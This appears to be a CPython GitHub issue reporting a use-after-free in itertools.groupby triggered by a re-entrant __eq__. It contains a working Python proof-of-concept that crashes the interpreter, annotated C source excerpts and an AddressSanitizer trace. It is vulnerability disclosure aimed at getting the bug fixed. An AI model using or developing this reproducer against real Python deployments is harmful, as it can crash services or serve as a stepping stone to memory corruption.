Skip to content

Use-after-free in itertools.groupby via re-entrant key comparison through __eq__ #143543

@jackfromeast

Description

@jackfromeast

What happened?

groupby_next compares the current and target keys with PyObject_RichCompareBool while holding only borrowed pointers to the active keys (gbo->tgtkey and gbo->currkey). A user-defined __eq__ can call back into next(groupby) mid-compare, advancing the iterator, replacing tgtkey/currkey/currvalue, and releasing the references to (and thereby freeing) objects still in use by the outer compare. The outer compare then dereferences freed memory, crashing in _Py_IsImmortal.

Proof of Concept:

from itertools import groupby


class Key(bytearray):
    # Key object whose __eq__ re-enters the groupby iterator exactly once.

    # Class-wide flag: becomes True once the re-entrant next(G) has been fired,
    # so the nested comparison does not recurse again.
    seen = False

    def __init__(self, is_first):
        # True only for the first key handed out by keys().
        self.is_first = is_first

    def __eq__(self, other):
        global G
        # Only the first key, on its first comparison, triggers the re-entry.
        if self.is_first and not Key.seen:
            Key.seen = True
            # Re-entrant call: advances G while the outer groupby_next is
            # still in the middle of comparing its keys.
            next(G)
            # Returning NotImplemented lets the comparison machinery fall back
            # to the reflected operand, which touches the operands again after
            # the nested call has already run.
            return NotImplemented
        return False


def keys():
    # Generator of keys: a single Key(True) first, then Key(False) forever.
    # Values passed in via send() are ignored.
    yield Key(True)
    while True:
        yield Key(False)


# keys().send is the key function: groupby calls it once per element, which
# resumes the generator and returns the next Key. The first element is None
# because a just-started generator only accepts send(None).
G = groupby([None, 1], keys().send)
# First call: fetches the first key; no target key exists yet, so no __eq__ runs.
next(G)
# Second call: a target key is now set, so groupby_next compares keys and
# reaches Key.__eq__, which re-enters next(G).
next(G)

Vulnerable Code Snippet:

Click to expand
/* Buggy Re-entrant Path */
/* Excerpt of the builtin next() implementation; elided parts are marked
   with "...".  It forwards to the iterator type's tp_iternext slot. */
static PyObject *
builtin_next(PyObject *self, PyObject *const *args, Py_ssize_t nargs)
{
    PyObject *it, *res;
    /* ... */
    it = args[0];
    /* For a groupby object this dispatches to groupby_next.  It is the route
       by which next(G) called from inside __eq__ re-enters groupby_next while
       an outer groupby_next call is still active. */
    res = (*Py_TYPE(it)->tp_iternext)(it);
    /* ... */
    return res;
}

/*
 * Iterator "next" for the groupby object, quoted as the vulnerable code.
 *
 * Steps the underlying state until the current key differs from the target
 * key (or no target key exists yet), then makes the current key the new
 * target and returns a 2-tuple of (current key, grouper).
 *
 * Returns NULL when the comparison reports an error, when groupby_step()
 * returns a negative value, or when _grouper_create() fails; otherwise
 * returns whatever PyTuple_Pack() produces.
 */
static PyObject *
groupby_next(PyObject *op)
{
    PyObject *r, *grouper;
    groupbyobject *gbo = groupbyobject_CAST(op);

    gbo->currgrouper = NULL;
    /* skip to next iteration group */
    for (;;) {
        if (gbo->currkey == NULL)
            /* pass */;  /* no current key yet: fall through to groupby_step() */
        else if (gbo->tgtkey == NULL)
            break;       /* no target key yet: the current key starts a group */
        else {
            int rcmp;

            /* BUG: gbo->tgtkey and gbo->currkey are handed to the comparison
               without taking a reference first.  The comparison can run a
               user-defined __eq__ that calls next() on this same groupby
               object; that nested call can replace gbo->tgtkey (Py_XSETREF
               below) and gbo->currkey (in groupby_step), releasing the old
               objects while this outer comparison is still using the
               pointers.
               NOTE(review): holding strong references to both keys across
               this call looks like the natural remedy -- confirm against the
               upstream fix. */
            rcmp = PyObject_RichCompareBool(gbo->tgtkey, gbo->currkey, Py_EQ);  /* crashing pointer derived */
            if (rcmp == -1)
                return NULL;   /* comparison raised */
            else if (rcmp == 0)
                break;         /* keys differ: a new group begins here */
        }

        /* Keys are equal (or there is no current key): move to the next item. */
        if (groupby_step(gbo) < 0)
            return NULL;
    }
    /* The current key becomes the new target key; Py_XSETREF releases the
       previous target key, if any. */
    Py_INCREF(gbo->currkey);
    Py_XSETREF(gbo->tgtkey, gbo->currkey);

    grouper = _grouper_create(gbo, gbo->tgtkey);
    if (grouper == NULL)
        return NULL;

    r = PyTuple_Pack(2, gbo->currkey, grouper);
    /* Drop the local reference to grouper, whether or not PyTuple_Pack
       succeeded. */
    Py_DECREF(grouper);
    return r;
}

/* Excerpt of the rich-comparison slot; elided parts are marked with "...".
   It forwards the comparison to the special method selected by name_op[op],
   called on self with other as its single argument.  In the sanitizer trace
   this is the frame from which the Python-level __eq__ runs. */
static PyObject *
slot_tp_richcompare(PyObject *self, PyObject *other, int op)
{
    /* Runs arbitrary Python code, which may call next() on the groupby
       object that is currently comparing self and other. */
    PyObject *res = _PyObject_MaybeCallSpecialOneArg(self, name_op[op], other);  /* Reentrant call site */
    /* ... */
    return res;
}

/* Reports whether op is immortal by inspecting op->ob_refcnt.  The test used
   depends on the pointer width (SIZEOF_VOID_P).  op must point to a live
   object: the read of ob_refcnt below is where AddressSanitizer flags the
   use-after-free in this report. */
static inline Py_ALWAYS_INLINE int _Py_IsImmortal(PyObject *op)
{
#if SIZEOF_VOID_P > 4
    /* Wide-pointer builds: immortal when the refcount, viewed as a signed
       32-bit value, is negative. */
    return _Py_CAST(PY_INT32_T, op->ob_refcnt) < 0;  /* Crash site */
#else
    /* Narrow-pointer builds: immortal when the refcount is at or above the
       immortal threshold. */
    return op->ob_refcnt >= _Py_IMMORTAL_MINIMUM_REFCNT;
#endif
}

/* Clobbering Path */
/* Excerpt: installs the next (key, value) pair on the groupby object.  The
   code that produces newvalue and newkey is elided ("...").  Returns 0 on the
   path shown here. */
Py_LOCAL_INLINE(int)
groupby_step(groupbyobject *gbo)
{
    PyObject *newvalue, *newkey, *oldvalue;
    /* ... */
    /* Store the new value before releasing the old one. */
    oldvalue = gbo->currvalue;
    gbo->currvalue = newvalue;
    /* Replaces currkey and releases the previous key.  If a caller further up
       the stack still holds that pointer without its own reference, the
       pointer may dangle from here on. */
    Py_XSETREF(gbo->currkey, newkey);  /* state mutate site */
    Py_XDECREF(oldvalue);
    return 0;
}

Sanitizer Output:

Click to expand
=================================================================
==252399==ERROR: AddressSanitizer: heap-use-after-free on address 0x51300001d3a0 at pc 0x5a6a780142bb bp 0x7fffd4fe72a0 sp 0x7fffd4fe7290
READ of size 4 at 0x51300001d3a0 thread T0
    #0 0x5a6a780142ba in _Py_IsImmortal Include/refcount.h:127
    #1 0x5a6a780142ba in _PyStackRef_FromPyObjectNew Include/internal/pycore_stackref.h:632
    #2 0x5a6a780142ba in _PyEval_Vector Python/ceval.c:1983
    #3 0x5a6a77e475e2 in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #4 0x5a6a77e475e2 in vectorcall_unbound Objects/typeobject.c:3033
    #5 0x5a6a77e475e2 in maybe_call_special_one_arg Objects/typeobject.c:3175
    #6 0x5a6a77e475e2 in _PyObject_MaybeCallSpecialOneArg Objects/typeobject.c:3190
    #7 0x5a6a77e475e2 in slot_tp_richcompare Objects/typeobject.c:10729
    #8 0x5a6a77db94df in do_richcompare Objects/object.c:1065
    #9 0x5a6a77db94df in PyObject_RichCompare Objects/object.c:1108
    #10 0x5a6a77db94df in PyObject_RichCompareBool Objects/object.c:1130
    #11 0x5a6a782cb6ad in groupby_next Modules/itertoolsmodule.c:549
    #12 0x5a6a77ff5d8a in builtin_next Python/bltinmodule.c:1681
    #13 0x5a6a77c953e7 in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #14 0x5a6a77c953e7 in PyObject_Vectorcall Objects/call.c:327
    #15 0x5a6a77b495a2 in _PyEval_EvalFrameDefault Python/generated_cases.c.h:1620
    #16 0x5a6a78013ad6 in _PyEval_EvalFrame Include/internal/pycore_ceval.h:121
    #17 0x5a6a78013ad6 in _PyEval_Vector Python/ceval.c:2001
    #18 0x5a6a78013ad6 in PyEval_EvalCode Python/ceval.c:884
    #19 0x5a6a7815916e in run_eval_code_obj Python/pythonrun.c:1365
    #20 0x5a6a7815916e in run_mod Python/pythonrun.c:1459
    #21 0x5a6a7815de17 in pyrun_file Python/pythonrun.c:1293
    #22 0x5a6a7815de17 in _PyRun_SimpleFileObject Python/pythonrun.c:521
    #23 0x5a6a7815e93c in _PyRun_AnyFileObject Python/pythonrun.c:81
    #24 0x5a6a781d1e3c in pymain_run_file_obj Modules/main.c:410
    #25 0x5a6a781d1e3c in pymain_run_file Modules/main.c:429
    #26 0x5a6a781d1e3c in pymain_run_python Modules/main.c:691
    #27 0x5a6a781d371e in Py_RunMain Modules/main.c:772
    #28 0x5a6a781d371e in pymain_main Modules/main.c:802
    #29 0x5a6a781d371e in Py_BytesMain Modules/main.c:826
    #30 0x7800fd62a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #31 0x7800fd62a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #32 0x5a6a77b6d634 in _start (/home/jackfromeast/Desktop/entropy/targets/grammar-afl++-latest/targets/cpython/python+0x206634) (BuildId: 4d105290d0ad566a4d6f4f7b2f05fbc9e317b533)

0x51300001d3a0 is located 32 bytes inside of 368-byte region [0x51300001d380,0x51300001d4f0)
freed by thread T0 here:
    #0 0x7800fdafc4d8 in free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52
    #1 0x5a6a77e268f3 in subtype_dealloc Objects/typeobject.c:2852
    #2 0x5a6a77db21d8 in _Py_Dealloc Objects/object.c:3200
    #3 0x5a6a7809da49 in Py_DECREF_MORTAL Include/internal/pycore_object.h:482
    #4 0x5a6a7809da49 in PyStackRef_XCLOSE Include/internal/pycore_stackref.h:736
    #5 0x5a6a7809da49 in _PyFrame_ClearLocals Python/frame.c:101
    #6 0x5a6a7809da49 in _PyFrame_ClearExceptCode Python/frame.c:126
    #7 0x5a6a78009052 in clear_thread_frame Python/ceval.c:1826
    #8 0x5a6a78009052 in _PyEval_FrameClearAndPop Python/ceval.c:1850
    #9 0x5a6a77b4df4c in _PyEval_EvalFrameDefault Python/generated_cases.c.h:10403
    #10 0x5a6a780142a5 in _PyEval_EvalFrame Include/internal/pycore_ceval.h:121
    #11 0x5a6a780142a5 in _PyEval_Vector Python/ceval.c:2001
    #12 0x5a6a77e475e2 in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #13 0x5a6a77e475e2 in vectorcall_unbound Objects/typeobject.c:3033
    #14 0x5a6a77e475e2 in maybe_call_special_one_arg Objects/typeobject.c:3175
    #15 0x5a6a77e475e2 in _PyObject_MaybeCallSpecialOneArg Objects/typeobject.c:3190
    #16 0x5a6a77e475e2 in slot_tp_richcompare Objects/typeobject.c:10729
    #17 0x5a6a77db92af in do_richcompare Objects/object.c:1059
    #18 0x5a6a77db92af in PyObject_RichCompare Objects/object.c:1108
    #19 0x5a6a77db92af in PyObject_RichCompareBool Objects/object.c:1130
    #20 0x5a6a782cb6ad in groupby_next Modules/itertoolsmodule.c:549
    #21 0x5a6a77ff5d8a in builtin_next Python/bltinmodule.c:1681
    #22 0x5a6a77c953e7 in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #23 0x5a6a77c953e7 in PyObject_Vectorcall Objects/call.c:327
    #24 0x5a6a77b495a2 in _PyEval_EvalFrameDefault Python/generated_cases.c.h:1620
    #25 0x5a6a78013ad6 in _PyEval_EvalFrame Include/internal/pycore_ceval.h:121
    #26 0x5a6a78013ad6 in _PyEval_Vector Python/ceval.c:2001
    #27 0x5a6a78013ad6 in PyEval_EvalCode Python/ceval.c:884
    #28 0x5a6a7815916e in run_eval_code_obj Python/pythonrun.c:1365
    #29 0x5a6a7815916e in run_mod Python/pythonrun.c:1459
    #30 0x5a6a7815de17 in pyrun_file Python/pythonrun.c:1293
    #31 0x5a6a7815de17 in _PyRun_SimpleFileObject Python/pythonrun.c:521
    #32 0x5a6a7815e93c in _PyRun_AnyFileObject Python/pythonrun.c:81
    #33 0x5a6a781d1e3c in pymain_run_file_obj Modules/main.c:410
    #34 0x5a6a781d1e3c in pymain_run_file Modules/main.c:429
    #35 0x5a6a781d1e3c in pymain_run_python Modules/main.c:691
    #36 0x5a6a781d371e in Py_RunMain Modules/main.c:772
    #37 0x5a6a781d371e in pymain_main Modules/main.c:802
    #38 0x5a6a781d371e in Py_BytesMain Modules/main.c:826
    #39 0x7800fd62a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #40 0x7800fd62a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #41 0x5a6a77b6d634 in _start (/home/jackfromeast/Desktop/entropy/targets/grammar-afl++-latest/targets/cpython/python+0x206634) (BuildId: 4d105290d0ad566a4d6f4f7b2f05fbc9e317b533)

previously allocated by thread T0 here:
    #0 0x7800fdafd9c7 in malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:69
    #1 0x5a6a77e3a88e in _PyObject_MallocWithType Include/internal/pycore_object_alloc.h:46
    #2 0x5a6a77e3a88e in _PyType_AllocNoTrack Objects/typeobject.c:2504
    #3 0x5a6a77e3aaf4 in PyType_GenericAlloc Objects/typeobject.c:2535
    #4 0x5a6a77e32118 in type_call Objects/typeobject.c:2448
    #5 0x5a6a77c939cd in _PyObject_MakeTpCall Objects/call.c:242
    #6 0x5a6a77b51f33 in _PyEval_EvalFrameDefault Python/generated_cases.c.h:1620
    #7 0x5a6a77ce9bc4 in _PyEval_EvalFrame Include/internal/pycore_ceval.h:121
    #8 0x5a6a77ce9bc4 in gen_send_ex2 Objects/genobject.c:259
    #9 0x5a6a77ce9bc4 in gen_send_ex Objects/genobject.c:301
    #10 0x5a6a77ce9bc4 in gen_send Objects/genobject.c:324
    #11 0x5a6a77c9572d in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #12 0x5a6a77c9572d in PyObject_CallOneArg Objects/call.c:395
    #13 0x5a6a782cb718 in groupby_step Modules/itertoolsmodule.c:519
    #14 0x5a6a782cb718 in groupby_next Modules/itertoolsmodule.c:556
    #15 0x5a6a77ff5d8a in builtin_next Python/bltinmodule.c:1681
    #16 0x5a6a77c953e7 in _PyObject_VectorcallTstate Include/internal/pycore_call.h:169
    #17 0x5a6a77c953e7 in PyObject_Vectorcall Objects/call.c:327
    #18 0x5a6a77b495a2 in _PyEval_EvalFrameDefault Python/generated_cases.c.h:1620
    #19 0x5a6a78013ad6 in _PyEval_EvalFrame Include/internal/pycore_ceval.h:121
    #20 0x5a6a78013ad6 in _PyEval_Vector Python/ceval.c:2001
    #21 0x5a6a78013ad6 in PyEval_EvalCode Python/ceval.c:884
    #22 0x5a6a7815916e in run_eval_code_obj Python/pythonrun.c:1365
    #23 0x5a6a7815916e in run_mod Python/pythonrun.c:1459
    #24 0x5a6a7815de17 in pyrun_file Python/pythonrun.c:1293
    #25 0x5a6a7815de17 in _PyRun_SimpleFileObject Python/pythonrun.c:521
    #26 0x5a6a7815e93c in _PyRun_AnyFileObject Python/pythonrun.c:81
    #27 0x5a6a781d1e3c in pymain_run_file_obj Modules/main.c:410
    #28 0x5a6a781d1e3c in pymain_run_file Modules/main.c:429
    #29 0x5a6a781d1e3c in pymain_run_python Modules/main.c:691
    #30 0x5a6a781d371e in Py_RunMain Modules/main.c:772
    #31 0x5a6a781d371e in pymain_main Modules/main.c:802
    #32 0x5a6a781d371e in Py_BytesMain Modules/main.c:826
    #33 0x7800fd62a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #34 0x7800fd62a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #35 0x5a6a77b6d634 in _start (/home/jackfromeast/Desktop/entropy/targets/grammar-afl++-latest/targets/cpython/python+0x206634) (BuildId: 4d105290d0ad566a4d6f4f7b2f05fbc9e317b533)

SUMMARY: AddressSanitizer: heap-use-after-free Include/refcount.h:127 in _Py_IsImmortal
Shadow bytes around the buggy address:
  0x51300001d100: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x51300001d180: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x51300001d200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51300001d280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51300001d300: 00 00 00 00 00 04 fa fa fa fa fa fa fa fa fa fa
=>0x51300001d380: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd
  0x51300001d400: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x51300001d480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x51300001d500: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x51300001d580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51300001d600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==252399==ABORTING

CPython versions tested on:

Details
Python Version Status Exit Code
Python 3.9.24+ (heads/3.9:111bbc15b26, Oct 28 2025, 16:51:20) ASAN 1
Python 3.10.19+ (heads/3.10:014261980b1, Oct 28 2025, 16:52:08) [Clang 18.1.3 (1ubuntu1)] ASAN 1
Python 3.11.14+ (heads/3.11:88f3f5b5f11, Oct 28 2025, 16:53:08) [Clang 18.1.3 (1ubuntu1)] ASAN 1
Python 3.12.12+ (heads/3.12:8cb2092bd8c, Oct 28 2025, 16:54:14) [Clang 18.1.3 (1ubuntu1)] ASAN 1
Python 3.13.9+ (heads/3.13:9c8eade20c6, Oct 28 2025, 16:55:18) [Clang 18.1.3 (1ubuntu1)] ASAN 1
Python 3.14.0+ (heads/3.14:2e216728038, Oct 28 2025, 16:56:16) [Clang 18.1.3 (1ubuntu1)] ASAN 1
Python 3.15.0a1+ (heads/main:f5394c257ce, Oct 28 2025, 19:29:54) [GCC 13.3.0] ASAN 1

Operating systems tested on:

Linux

Output from running 'python -VV' on the command line:

Python 3.15.0a1+ (heads/main:f5394c257ce, Oct 28 2025, 19:29:54) [GCC 13.3.0]

Metadata

Metadata

Assignees

No one assigned

    Labels

    extension-modules (C modules in the Modules dir), type-crash (A hard crash of the interpreter, possibly with a core dump)

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions